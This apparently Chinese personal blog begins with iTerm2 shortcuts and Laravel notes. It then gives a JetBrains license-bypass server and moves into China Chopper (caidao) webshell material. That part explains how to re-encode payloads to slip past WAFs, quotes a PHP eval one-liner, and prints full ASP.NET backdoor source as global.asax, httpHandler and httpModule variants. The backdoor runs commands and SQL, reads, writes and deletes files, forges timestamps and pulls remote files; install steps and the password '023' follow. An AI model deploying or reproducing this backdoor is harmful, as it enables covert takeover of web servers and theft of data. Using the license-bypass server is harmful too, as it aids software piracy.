分类 学习类 下的文章

iterm2 快捷键大全 Mac item2常用快捷键

标签

新建标签:command + t

关闭标签:command + w

切换标签:command + 数字 command + 左右方向键

切换全屏:command + enter

查找:command + f

分屏

垂直分屏:command + d

水平分屏:command + shift + d

切换屏幕:command + option + 方向键 command + [ 或 command + ]

查看历史命令:command + ;

查看剪贴板历史:command + shift + h

其他

清除当前行:ctrl + u

到行首:ctrl + a

到行尾:ctrl + e

前进后退:ctrl + f/b (相当于左右方向键)

上一条命令:ctrl + p

搜索命令历史:ctrl + r

删除当前光标的字符:ctrl + d

删除光标之前的字符:ctrl + h

删除光标之前的单词:ctrl + w

删除到文本末尾:ctrl + k

交换光标处文本:ctrl + t

清屏1:command + r

清屏2:ctrl + l

自带有哪些很实用的功能/快捷键

⌘ + 数字在各 tab 标签直接来回切换

选择即复制 + 鼠标中键粘贴,这个很实用

⌘ + f 所查找的内容会被自动复制

⌘ + d 横着分屏 / ⌘ + shift + d 竖着分屏

⌘ + r = clear,而且只是换到新一屏,不会想 clear 一样创建一个空屏

ctrl + u 清空当前行,无论光标在什么位置

输入开头命令后 按 ⌘ + ; 会自动列出输入过的命令

⌘ + shift + h 会列出剪切板历史

可以在 Preferences > keys 设置全局快捷键调出 iterm,这个也可以用过 Alfred 实现

我常用的一些快捷键

⌘ + 1 / 2 左右 tab 之间来回切换,这个在 前面 已经介绍过了

⌘← / ⌘→ 到一行命令最左边/最右边 ,这个功能同 C+a / C+e

⌥← / ⌥→ 按单词前移/后移,相当与 C+f / C+b,其实这个功能在Iterm中已经预定义好了,⌥f / ⌥b,看个人习惯了

好像就这几个。。囧

设置方法如下

当然除了这些可以自定义的也不能忘了 linux 下那些好用的组合

C+a / C+e 这个几乎在哪都可以使用

C+p / !! 上一条命令

C+k 从光标处删至命令行尾 (本来 C+u 是删至命令行首,但iterm中是删掉整行)

C+w A+d 从光标处删至字首/尾

C+h C+d 删掉光标前后的自负

C+y 粘贴至光标后

C+r 搜索命令历史,这个较常用

laravel 手记

laravel 5.2 手动增加helpers.php

在app目录下面建立文件夹Libraries.在该文件夹下面创建文件helpers.php,文件内容如下

<?php
/**
 * User: Sky
 * Date: 2016-07-25
 * Time: 13:25
 */

if(! function_exists('TestFun')){
    function TestFun($test){
        return $test
    }

}

然后修改bootstrap目录下面的autoload.php文件内容
require __DIR__.'/../vendor/autoload.php';下面添加require __DIR__.'/../app/Libraries/helpers.php';
这样就可以了= =,

==========================================================================
删除laravel中安装过不想用的包

composer remove "vendor/packagename"

获取客户端ip的话用

use Illuminate\Support\Facades\Request;

然后在用该类下面的getClientIp方法
如:

$ip=Request::getClientIp()

=========================================================================
阿里大于sms短信通知接口

https://packagist.org/packages/iscms/alisms-for-laravel

配置方法:
从终端或命令行进入您的项目目录,运行

composer require iscms/alisms-for-laravel

iscms\Alisms\AlidayuServiceProvider::class

加入configapp.php的Providers下 类似

 ...
    /*
     * Application Service Providers...
    */
    App\Providers\AppServiceProvider::class,
    App\Providers\AuthServiceProvider::class,
    App\Providers\EventServiceProvider::class,
    App\Providers\RouteServiceProvider::class,
    ...
    iscms\Alisms\AlidayuServiceProvider::class

运行

php artisan vendor:publish

将配置文件发布到您的配置目录中 4. 您的config目录应该增加了alisms.php配置文件

<?php
    return [
        'KEY' =>env('ALISMS_KEY',null),
        'SECRETKEY'=>env('ALISMS_SECRETKEY',null),
    ];

5.然后您需要在您项目的 ENV 配置文件中写入 SMS 配置 例如

   ALISMS_KEY=23305789
   ALISMS_SECRETKEY=**************

此处ALISMS_SECRETKEY是指您的账户应用密码,请勿透露给他人

开始使用
在您需要调用短信服务的控制器中,引用SMS

use iscms\Alisms\SendsmsPusher as Sms;
public function __construct(Sms $sms)
{
   $this->sms=$sms;
}

public function index()
{
   $result=$this->sms->send("$phone","$name","$content",'$code');
}
  1. 返回执行发送的结果

参数说明
在开始使用中 send 方法一共加入了4个参数

$phone,$name,$content,$code $phone 指接受短信方的短信号码, $name 指短信签名
可以在阿里大鱼短信签名 http://www.alidayu.com/admin/service/sign 找到 $content
是指短信模板中的变量内容.举个例子

在自己的阿里大鱼模板里面有下面一个短信模板

 模板名称: 身份验证验证码
    模板ID: SMS_3910275
    *模板内容:
    验证码${code},您正在进行${product}身份验证,打死不要告诉别人哦!
那么里面存在着2个变量需要替换,一个是${code} ,一个是${product}

那么对应的我们的$content 就应该为

 {
      code:"生成的验证码",
      product:"示例项目"
    }

$code 指在阿里云中的模板ID,上面的例子中使用了一个身份验证模板,那$code 应该填写 > SMS_3910275

到这里应该没有问题了,开始发送短信吧~ ^_^

其他的,用到了在补上

Idea 激活服务器

主要平时老用jetbrains系列的编辑器,每次还要激活找激活码什么的,太麻烦了,就自己搭建了一个,方便自己用.

激活过程如下:
1、激活的时候选择License server
2、填写server地址为http://idea.03sec.com:8727
3、保存,激活成功!
下载.png

caidao.conf参数表

  1. <FLAG>

返回的内容分隔符,只限三个字符。我们知道原来的分割符是 ->| 与 |<-, 有些 waf 会拦截这个字符,所以,我们可以用生辟点的字符,比如说 ~>$。

  1. <UA>

定制 HTTP 请求中的 User-Agent 部分,我们看到默认的 caidao.conf 中将 UA 改成了百度蜘蛛的 UA, 当然你可以改成 Google 的嘛。有些时候需要改改,大部分情况下这个参数可以不用改。

  1. <K1> 与 <K2>

POST的参数名称,默认情况下, K1 是 z1,K2 是 z2。一般情况下,waf 是不会拦这个,所以可以不用改。

  1. <PHP_BASE>, <ASP_BASE>, <ASPX_BASE>, <PHP_BASE.加密示例>

这4个是 webshell 的基础代码部分,所有的功能代码都会发到这里进行组装,然后发送到服务端去。

如果你服务端的 webshell 做了一层加解密操作,比如服务端代码是这样的

<?php @eval(base64_decode($_POST['caidao']));?>

那么,你就可以在这里修改配置为

<PHP_BASE.加密示例>eval(base64_decode($_POST[id]));&id=%s</PHP_BASE.加密示例>

可以负责任的讲,免杀,过 waf 大部分都是在这里作文章的,后面基本都是一些功能函数,waf 一般是不会杀的,他要是敢杀,就证明他的业务中不需要那类操作。

这里就有意思了,你想,以前的菜刀只有一个 base64_decode 那现在,你就可以随便改了,比如说,你用 hex, 再比如你可以用凯撒密码,又或者是栅栏密码,再过分点,你可以用 AES, DES,最过分的就是自己写一个加密解密的算法。那样 waf 想拦就很尴尬了。(作者说的过 waf 大概就是这层意思吧)

  1. <GETBASEINFO>

获取基础信息的功能代码。比如你添加完 shell, 直接去虚拟终端,一进去就会显示当前路径,当前用户,系统类型什么的这些。

  1. <SHOWFOLDER>

文件目录查看功能代码。这里主要就是用户传进来一个路径,然后把这个路径下的目录,文件全都显示出来,包括一些属性,比如文件时间,权限,类型等。

  1. <SHOWTXTFILE>

查看文件内容,编辑文件也首先调用的就是这里。

  1. <SAVETXTFILE>

保存文件。

  1. <DELETEFILE>

删除文件。

10.<DOWNFILE>

下载服务器文件到本地。

  1. <UPLOADFILE>

上传文件到服务端。

  1. <PASTEFILE>

粘贴文件。

  1. <NEWFOLDER>

新建目录。

  1. <WGET>

从远程下载一个文件到服务器。

  1. <SHELL>

执行系统命令,这里比较尴尬的地方,就是相关函数被干掉的话,基本是没戏。

其它的就是一些数据库的功能代码了,我实在是不想写了,就那几个单词,百度翻译都知道是什么意思,我就不翻译了哈。

菜刀Customize类型 ASP.NET global.asax、httpHandlers、httpModules

特别注意:需要特别小心配置任何一个误操作都可能导致网站彻底崩溃,对于新手操作危险系数很高。这里只是技术分享,请最好先在本地测试。如有发现BUG与我联系 :) @园长
最近一直在折腾asp.net,看到有类似需求所以写了这个玩意。

一:global.asax

<%@ Application Language="C#" %> 

<script RunAt='server'> 

    void Application_Start(object sender, EventArgs e) 
    { 
        //在应用程序启动时运行的代码 

    } 

    void Application_End(object sender, EventArgs e) 
    { 
        //在应用程序关闭时运行的代码 

    } 

    void Application_Error(object sender, EventArgs e) 
    { 


    } 

    void Session_Start(object sender, EventArgs e) 
    { 
        //在新会话启动时运行的代码 

    } 

    void Session_End(object sender, EventArgs e) 
    { 
        //在会话结束时运行的代码。 
        // 注意: 只有在 Web.config 文件中的 sessionstate 模式设置为 
        // InProc 时,才会引发 Session_End 事件。如果会话模式 
        //设置为 StateServer 或 SQLServer,则不会引发该事件。 

    } 

    void CP(string S, string D) 
    { 
        if (System.IO.Directory.Exists(S)) 
        { 
            System.IO.DirectoryInfo m = new System.IO.DirectoryInfo(S); 
            System.IO.Directory.CreateDirectory(D); 
            foreach (System.IO.FileInfo F in m.GetFiles()) 
            { 
                System.IO.File.Copy(S + "\\" + F.Name, D + "\\" + F.Name); 
            } 
            foreach (System.IO.DirectoryInfo F in m.GetDirectories()) 
            { 
                CP(S + "\\" + F.Name, D + "\\" + F.Name); 
            } 
        } 
        else 
        { 
            System.IO.File.Copy(S, D); 
        } 
    } 

    void EvalRequest(string action) 
    { 
        HttpContext context = HttpContext.Current; 
        HttpRequest request = context.Request; 
        HttpResponse response = context.Response; 

        string Z = action; 
        if (Z != "") 
        { 
            string Z1 = request.Form["Z1"]; 
            string Z2 = request.Form["Z2"]; 
            string R = ""; 
            try 
            { 
                switch (Z) 
                { 
                    case "A": 
                        { 
                            string[] c = System.IO.Directory.GetLogicalDrives(); 
                            R = string.Format("{0}\t", context.Server.MapPath("~")); 
                            for (int i = 0; i < c.Length; i++) 
                                R += c[i][0] + ":"; 
                            break; 
                        } 
                    case "B": 
                        { 
                            System.IO.DirectoryInfo m = new System.IO.DirectoryInfo(Z1); 
                            foreach (System.IO.DirectoryInfo D in m.GetDirectories()) 
                            { 
                                R += string.Format("{0}/\t{1}\t0\t-\n", D.Name, System.IO.File.GetLastWriteTime(Z1 + D.Name).ToString("yyyy-MM-dd hh:mm:ss")); 
                            } 
                            foreach (System.IO.FileInfo D in m.GetFiles()) 
                            { 
                                R += string.Format("{0}\t{1}\t{2}\t-\n", D.Name, System.IO.File.GetLastWriteTime(Z1 + D.Name).ToString("yyyy-MM-dd hh:mm:ss"), D.Length); 
                            } 
                            break; 
                        } 
                    case "C": 
                        { 
                            System.IO.StreamReader m = new System.IO.StreamReader(Z1, Encoding.Default); 
                            R = m.ReadToEnd(); 
                            m.Close(); 
                            break; 
                        } 
                    case "D": 
                        { 
                            System.IO.StreamWriter m = new System.IO.StreamWriter(Z1, false, Encoding.Default); 
                            m.Write(Z2); 
                            R = "1"; 
                            m.Close(); 
                            break; 
                        } 
                    case "E": 
                        { 
                            if (System.IO.Directory.Exists(Z1)) 
                                System.IO.Directory.Delete(Z1, true); 
                            else 
                                System.IO.File.Delete(Z1); 
                            R = "1"; 
                            break; 
                        } 
                    case "F": 
                        { 
                            response.Clear(); 
                            response.Write("\x2D\x3E\x7C"); 
                            response.WriteFile(Z1); 
                            response.Write("\x7C\x3C\x2D"); 
                            goto End; 
                        } 
                    case "G": 
                        { 
                            byte[] B = new byte[Z2.Length / 2]; 
                            for (int i = 0; i < Z2.Length; i += 2) 
                            { 
                                B[i / 2] = (byte)Convert.ToInt32(Z2.Substring(i, 2), 16);
                            } 
                            System.IO.FileStream fs = new System.IO.FileStream(Z1, System.IO.FileMode.Create); 
                            fs.Write(B, 0, B.Length); 
                            fs.Close(); 
                            R = "1"; 
                            break; 
                        } 
                    case "H": 
                        { 
                            CP(Z1, Z2); 
                            R = "1"; 
                            break; 
                        } 
                    case "I": 
                        { 
                            if (System.IO.Directory.Exists(Z1)) 
                            { 
                                System.IO.Directory.Move(Z1, Z2); 
                            } 
                            else 
                            { 
                                System.IO.File.Move(Z1, Z2); 
                            } 
                            break; 
                        } 
                    case "J": 
                        { 
                            System.IO.Directory.CreateDirectory(Z1); 
                            R = "1"; 
                            break; 
                        } 
                    case "K": 
                        { 
                            DateTime TM = Convert.ToDateTime(Z2); 
                            if (System.IO.Directory.Exists(Z1)) 
                            { 
                                System.IO.Directory.SetCreationTime(Z1, TM); 
                                System.IO.Directory.SetLastWriteTime(Z1, TM); 
                                System.IO.Directory.SetLastAccessTime(Z1, TM); 
                            } 
                            else 
                            { 
                                System.IO.File.SetCreationTime(Z1, TM); 
                                System.IO.File.SetLastWriteTime(Z1, TM); 
                                System.IO.File.SetLastAccessTime(Z1, TM); 
                            } 
                            R = "1"; 
                            break; 
                        } 
                    case "L": 
                        { 
                            System.Net.HttpWebRequest RQ = (System.Net.HttpWebRequest)System.Net.WebRequest.Create(new Uri(Z1)); 
                            RQ.Method = "GET"; 
                            RQ.ContentType = "application/x-www-form-urlencoded"; 
                            System.Net.HttpWebResponse WB = (System.Net.HttpWebResponse)RQ.GetResponse(); 
                            System.IO.Stream WF = WB.GetResponseStream(); 
                            System.IO.FileStream FS = new System.IO.FileStream(Z2, System.IO.FileMode.Create, System.IO.FileAccess.Write); 
                            int i; 
                            byte[] buffer = new byte[1024]; 
                            while (true) 
                            { 
                                i = WF.Read(buffer, 0, buffer.Length); 
                                if (i < 1) break; FS.Write(buffer, 0, i); 
                            } 
                            WF.Close(); 
                            WB.Close(); 
                            FS.Close(); 
                            R = "1"; 
                            break; 
                        } 
                    case "M": 
                        { 
                            System.Diagnostics.ProcessStartInfo c = new System.Diagnostics.ProcessStartInfo(Z1.Substring(2)); 
                            System.Diagnostics.Process e = new System.Diagnostics.Process(); 
                            System.IO.StreamReader OT, ER; 
                            c.UseShellExecute = false; 
                            c.RedirectStandardOutput = true; 
                            c.RedirectStandardError = true; 
                            e.StartInfo = c; 
                            c.Arguments = string.Format("{0} {1}", Z1.Substring(0, 2), Z2); 
                            e.Start(); OT = e.StandardOutput; 
                            ER = e.StandardError; 
                            e.Close(); 
                            R = OT.ReadToEnd() + ER.ReadToEnd(); 
                            break; 
                        } 
                    case "N": 
                        { 
                            String strDat = Z1.ToUpper(); 
                            System.Data.SqlClient.SqlConnection Conn = new System.Data.SqlClient.SqlConnection(Z1); 
                            Conn.Open(); 
                            R = Conn.Database + "\t"; 
                            Conn.Close(); break; 
                        } 
                    case "O": 
                        { 
                            String[] x = Z1.Replace("\r", "").Split('\n'); 
                            String strConn = x[0], strDb = x[1]; 
                            System.Data.SqlClient.SqlConnection Conn = new System.Data.SqlClient.SqlConnection(strConn); 
                            Conn.Open(); 
                            System.Data.DataTable dt = Conn.GetSchema("Columns"); 
                            Conn.Close(); 
                            for (int i = 0; i < dt.Rows.Count; i++) 
                            { 
                                R += String.Format("{0}\t", dt.Rows[i][2].ToString()); 
                            } 
                            break; 
                        } 
                    case "P": 
                        { 
                            String[] x = Z1.Replace("\r", "").Split('\n'), p = new String[4]; 
                            String strConn = x[0], strDb = x[1], strTable = x[2]; p[0] = strDb; 
                            p[2] = strTable; 
                            System.Data.SqlClient.SqlConnection Conn = new System.Data.SqlClient.SqlConnection(strConn); 
                            Conn.Open(); 
                            System.Data.DataTable dt = Conn.GetSchema("Columns", p); 
                            Conn.Close(); 
                            for (int i = 0; i < dt.Rows.Count; i++) 
                            { 
                                R += String.Format("{0} ({1})\t", dt.Rows[i][3].ToString(), dt.Rows[i][7].ToString()); 
                            } 
                            break; 
                        } 
                    case "Q": 
                        { 
                            String[] x = Z1.Replace("\r", "").Split('\n'); 
                            String strDat, strConn = x[0], strDb = x[1]; 
                            int i, c; 
                            strDat = Z2.ToUpper(); 
                            System.Data.SqlClient.SqlConnection Conn = new System.Data.SqlClient.SqlConnection(strConn); 
                            Conn.Open(); 
                            if (strDat.IndexOf("SELECT ") == 0 || strDat.IndexOf("EXEC ") == 0 || strDat.IndexOf("DECLARE ") == 0) 
                            { 
                                System.Data.SqlClient.SqlDataAdapter OD = new System.Data.SqlClient.SqlDataAdapter(Z2, Conn); 
                                System.Data.DataSet ds = new System.Data.DataSet(); 
                                OD.Fill(ds); 
                                if (ds.Tables.Count > 0) 
                                { 
                                    System.Data.DataRowCollection rows = ds.Tables[0].Rows; 
                                    for (c = 0; c < ds.Tables[0].Columns.Count; c++) 
                                    { 
                                        R += String.Format("{0}\t|\t", ds.Tables[0].Columns[c].ColumnName.ToString()); 
                                    } 
                                    R += "\r\n"; 
                                    for (i = 0; i < rows.Count; i++) 
                                    { 
                                        for (c = 0; c < ds.Tables[0].Columns.Count; c++) 
                                        { 
                                            R += String.Format("{0}\t|\t", rows[i][c].ToString()); 
                                        } 
                                        R += "\r\n"; 
                                    } 
                                } 
                                ds.Clear(); 
                                ds.Dispose(); 
                            } 
                            else 
                            { 
                                System.Data.SqlClient.SqlCommand cm = Conn.CreateCommand(); 
                                cm.CommandText = Z2; 
                                cm.ExecuteNonQuery(); 
                                R = "Result\t|\t\r\nExecute Successfully!\t|\t\r\n"; 
                            } 
                            Conn.Close(); 
                            break; 
                        } 
                    default: 
                        goto End; 
                } 
            } 
            catch (Exception E) 
            { 
                R = "ERROR:// " + E.Message; 
            } 
            response.Write("\x2D\x3E\x7C" + R + "\x7C\x3C\x2D"); 
        End: ; 
        } 
    } 

    //在接收到一个应用程序请求时触发。对于一个请求来说,它是第一个被触发的事件,请求一般是用户输入的一个页面请求(URL)。 
    void Application_BeginRequest(object sender, EventArgs evt) 
    { 
        string action = Request.Form["023"]; 
        if (action != null) 
        { 
            EvalRequest(action); 
            Response.End(); 
        } 
    } 

</script>

二、httpHandlers
修改web.config,添加或者修改httpHandlers:

<httpHandlers> 
   <add path="*.api" verb="*" type="WooYun.CustomizeHttpHandler"/> 
</httpHandlers>

如果已经存在 httpHandlers 则在标签内添加,如果<system.webServer>也有配置httpHandlers那么就配置在<system.webServer>里,但是有一点需要特别注意:<system.webServer>里面一定要配置runAllManagedModulesForAllRequests为true,否会启动报错。

<system.webServer> 
    <modules runAllManagedModulesForAllRequests="true" /> 
</system.webServer>

Customize.cs代码:

using System; 
using System.Data; 
using System.Configuration; 
using System.Web; 
using System.IO; 
using System.Text; 
using System.Net; 
using System.Diagnostics; 
using System.Data.SqlClient; 

namespace WooYun 
{ 

    public class Customize 
    { 

        public static void CP(string S, string D) 
        { 
            if (Directory.Exists(S)) 
            { 
                DirectoryInfo m = new DirectoryInfo(S); 
                Directory.CreateDirectory(D); 
                foreach (FileInfo F in m.GetFiles()) 
                { 
                    File.Copy(S + "\\" + F.Name, D + "\\" + F.Name); 
                } 
                foreach (DirectoryInfo F in m.GetDirectories()) 
                { 
                    CP(S + "\\" + F.Name, D + "\\" + F.Name); 
                } 
            } 
            else 
            { 
                File.Copy(S, D); 
            } 
        } 

        public static void Request() 
        { 
            HttpContext context = HttpContext.Current; 
            HttpRequest request = context.Request; 
            HttpResponse response = context.Response; 
            string Z = request.Form["023"]; 
            if (Z != "") 
            { 
                string Z1 = request.Form["Z1"]; 
                string Z2 = request.Form["Z2"]; 
                string R = ""; 
                try 
                { 
                    switch (Z) 
                    { 
                        case "A": 
                            { 
                                string[] c = Directory.GetLogicalDrives(); 
                                R = string.Format("{0}\t", context.Server.MapPath("/")); 
                                for (int i = 0; i < c.Length; i++) 
                                    R += c[i][0] + ":"; 
                                break; 
                            } 
                        case "B": 
                            { 
                                DirectoryInfo m = new DirectoryInfo(Z1); 
                                foreach (DirectoryInfo D in m.GetDirectories()) 
                                { 
                                    R += string.Format("{0}/\t{1}\t0\t-\n", D.Name, File.GetLastWriteTime(Z1 + D.Name).ToString("yyyy-MM-dd hh:mm:ss")); 
                                } 
                                foreach (FileInfo D in m.GetFiles()) 
                                { 
                                    R += string.Format("{0}\t{1}\t{2}\t-\n", D.Name, File.GetLastWriteTime(Z1 + D.Name).ToString("yyyy-MM-dd hh:mm:ss"), D.Length); 
                                } 
                                break; 
                            } 
                        case "C": 
                            { 
                                StreamReader m = new StreamReader(Z1, Encoding.Default); 
                                R = m.ReadToEnd(); 
                                m.Close(); 
                                break; 
                            } 
                        case "D": 
                            { 
                                StreamWriter m = new StreamWriter(Z1, false, Encoding.Default); 
                                m.Write(Z2); 
                                R = "1"; 
                                m.Close(); 
                                break; 
                            } 
                        case "E": 
                            { 
                                if (Directory.Exists(Z1)) 
                                    Directory.Delete(Z1, true); 
                                else 
                                    File.Delete(Z1); 
                                R = "1"; 
                                break; 
                            } 
                        case "F": 
                            { 
                                response.Clear(); 
                                response.Write("\x2D\x3E\x7C"); 
                                response.WriteFile(Z1); 
                                response.Write("\x7C\x3C\x2D"); 
                                goto End; 
                            } 
                        case "G": 
                            { 
                                byte[] B = new byte[Z2.Length / 2]; 
                                for (int i = 0; i < Z2.Length; i += 2) 
                                { 
                                    B[i / 2] = (byte)Convert.ToInt32(Z2.Substring(i, 2), 16); 
                                } 
                                FileStream fs = new FileStream(Z1, FileMode.Create); 
                                fs.Write(B, 0, B.Length); 
                                fs.Close(); 
                                R = "1"; 
                                break; 
                            } 
                        case "H": 
                            { 
                                CP(Z1, Z2); R = "1"; 
                                break; 
                            } 
                        case "I": 
                            { 
                                if (Directory.Exists(Z1)) 
                                { 
                                    Directory.Move(Z1, Z2); 
                                } 
                                else 
                                { 
                                    File.Move(Z1, Z2); 
                                } 
                                break; 
                            } 
                        case "J": 
                            { 
                                Directory.CreateDirectory(Z1); 
                                R = "1"; 
                                break; 
                            } 
                        case "K": 
                            { 
                                DateTime TM = Convert.ToDateTime(Z2); 
                                if (Directory.Exists(Z1)) 
                                { 
                                    Directory.SetCreationTime(Z1, TM); 
                                    Directory.SetLastWriteTime(Z1, TM); 
                                    Directory.SetLastAccessTime(Z1, TM); 
                                } 
                                else 
                                { 
                                    File.SetCreationTime(Z1, TM); 
                                    File.SetLastWriteTime(Z1, TM); 
                                    File.SetLastAccessTime(Z1, TM); 
                                } 
                                R = "1"; 
                                break; 
                            } 
                        case "L": 
                            { 
                                HttpWebRequest RQ = (HttpWebRequest)WebRequest.Create(new Uri(Z1)); 
                                RQ.Method = "GET"; 
                                RQ.ContentType = "application/x-www-form-urlencoded"; 
                                HttpWebResponse WB = (HttpWebResponse)RQ.GetResponse(); 
                                Stream WF = WB.GetResponseStream(); 
                                FileStream FS = new FileStream(Z2, FileMode.Create, FileAccess.Write); 
                                int i; 
                                byte[] buffer = new byte[1024]; 
                                while (true) 
                                { 
                                    i = WF.Read(buffer, 0, buffer.Length); 
                                    if (i < 1) break; FS.Write(buffer, 0, i); 
                                } 
                                WF.Close(); 
                                WB.Close(); 
                                FS.Close(); 
                                R = "1"; 
                                break; 
                            } 
                        case "M": 
                            { 
                                System.Diagnostics.ProcessStartInfo c = new System.Diagnostics.ProcessStartInfo(Z1.Substring(2)); 
                                System.Diagnostics.Process e = new System.Diagnostics.Process(); 
                                System.IO.StreamReader OT, ER; 
                                c.UseShellExecute = false; 
                                c.RedirectStandardOutput = true; 
                                c.RedirectStandardError = true; 
                                e.StartInfo = c; 
                                c.Arguments = string.Format("{0} {1}", Z1.Substring(0, 2), Z2); 
                                e.Start(); 
                                OT = e.StandardOutput; 
                                ER = e.StandardError; 
                                e.Close(); 
                                R = OT.ReadToEnd() + ER.ReadToEnd(); 
                                break; 
                            } 
                        case "N": 
                            { 
                                String strDat = Z1.ToUpper(); 
                                SqlConnection Conn = new SqlConnection(Z1); 
                                Conn.Open(); 
                                R = Conn.Database + "\t"; 
                                Conn.Close(); 
                                break; 
                            } 
                        case "O": 
                            { 
                                String[] x = Z1.Replace("\r", "").Split('\n'); 
                                String strConn = x[0], strDb = x[1]; 
                                SqlConnection Conn = new SqlConnection(strConn); 
                                Conn.Open(); 
                                DataTable dt = Conn.GetSchema("Columns"); 
                                Conn.Close(); 
                                for (int i = 0; i < dt.Rows.Count; i++) 
                                { 
                                    R += String.Format("{0}\t", dt.Rows[i][2].ToString()); 
                                } 
                                break; 
                            } 
                        case "P": 
                            { 
                                String[] x = Z1.Replace("\r", "").Split('\n'), p = new String[4]; 
                                String strConn = x[0], strDb = x[1], strTable = x[2]; 
                                p[0] = strDb; 
                                p[2] = strTable; 
                                SqlConnection Conn = new SqlConnection(strConn); 
                                Conn.Open(); 
                                DataTable dt = Conn.GetSchema("Columns", p); 
                                Conn.Close(); 
                                for (int i = 0; i < dt.Rows.Count; i++) 
                                { 
                                    R += String.Format("{0} ({1})\t", dt.Rows[i][3].ToString(), dt.Rows[i][7].ToString()); 
                                } 
                                break; 
                            } 
                        case "Q": 
                            { 
                                String[] x = Z1.Replace("\r", "").Split('\n'); 
                                String strDat, strConn = x[0], strDb = x[1]; 
                                int i, c; 
                                strDat = Z2.ToUpper(); 
                                SqlConnection Conn = new SqlConnection(strConn); 
                                Conn.Open(); 
                                if (strDat.IndexOf("SELECT ") == 0 || strDat.IndexOf("EXEC ") == 0 || strDat.IndexOf("DECLARE ") == 0) 
                                { 
                                    SqlDataAdapter OD = new SqlDataAdapter(Z2, Conn); 
                                    DataSet ds = new DataSet(); OD.Fill(ds); 
                                    if (ds.Tables.Count > 0) 
                                    { 
                                        DataRowCollection rows = ds.Tables[0].Rows; 
                                        for (c = 0; c < ds.Tables[0].Columns.Count; c++) 
                                        { 
                                            R += String.Format("{0}\t|\t", ds.Tables[0].Columns[c].ColumnName.ToString()); 
                                        } 
                                        R += "\r\n"; for (i = 0; i < rows.Count; i++) 
                                        { 
                                            for (c = 0; c < ds.Tables[0].Columns.Count; c++) 
                                            { 
                                                R += String.Format("{0}\t|\t", rows[i][c].ToString()); 
                                            } 
                                            R += "\r\n"; 
                                        } 
                                    } 
                                    ds.Clear(); 
                                    ds.Dispose(); 
                                } 
                                else 
                                { 
                                    SqlCommand cm = Conn.CreateCommand(); 
                                    cm.CommandText = Z2; 
                                    cm.ExecuteNonQuery(); 
                                    R = "Result\t|\t\r\nExecute Successfully!\t|\t\r\n"; 
                                } 
                                Conn.Close(); 
                                break; 
                            } 
                        default: 
                            goto End; 
                    } 
                } 
                catch (Exception E) 
                { 
                    R = "ERROR:// " + E.Message; 
                } 
                response.Write("\x2D\x3E\x7C" + R + "\x7C\x3C\x2D"); 
            End: ; 
            } 
            response.End(); 
        } 
    } 

    public class CustomizeHttpHandler : IHttpHandler 
    { 
        public bool IsReusable 
        { 
            get 
            { 
                return true; 
            } 
        } 

        public void ProcessRequest(HttpContext context) 
        { 
            Customize.Request(); 
        } 
    } 

    public class CustomizeHttpModule : IHttpModule 
    { 

        #region IHttpModule 成员 

        public void Dispose() 
        { 

        } 

        public void Init(HttpApplication context) 
        { 
            context.BeginRequest += new EventHandler(context_BeginRequest); 
        } 

        void context_BeginRequest(object sender, EventArgs e) 
        { 
            Customize.Request(); 
        } 

        #endregion 
    } 

}

四:安装方法

global.asax是不需要编译的,所以直接忽略。

httpHandlers和httpModules配置方式:

1、自行编译上面的cs文件dll 
2、复制dll到bin目录 
3、修改上述配置,并仔细检查

或:

1、直接新建个Customize.cs文件 
2、复制Customize.cs文件到App_Code目录 
3、修改上述配置,并仔细检查

连接:

1、菜刀连接的时候必须选Customize: 
2、httpHandlers 可以自己指定后缀,比如你配置了.api请求那么可以http://xx.com/123456.api做为shell地址,可能会有不能拦截除aspx的情况 
3、httpModules可以随便访问一个只要不是静态文件的链接(比如jpg文件不允许被POST) 可以访问:http://xx.com/123456.xxx 
4、连接密码:023

FROM:http://p2j.cn/?p=1755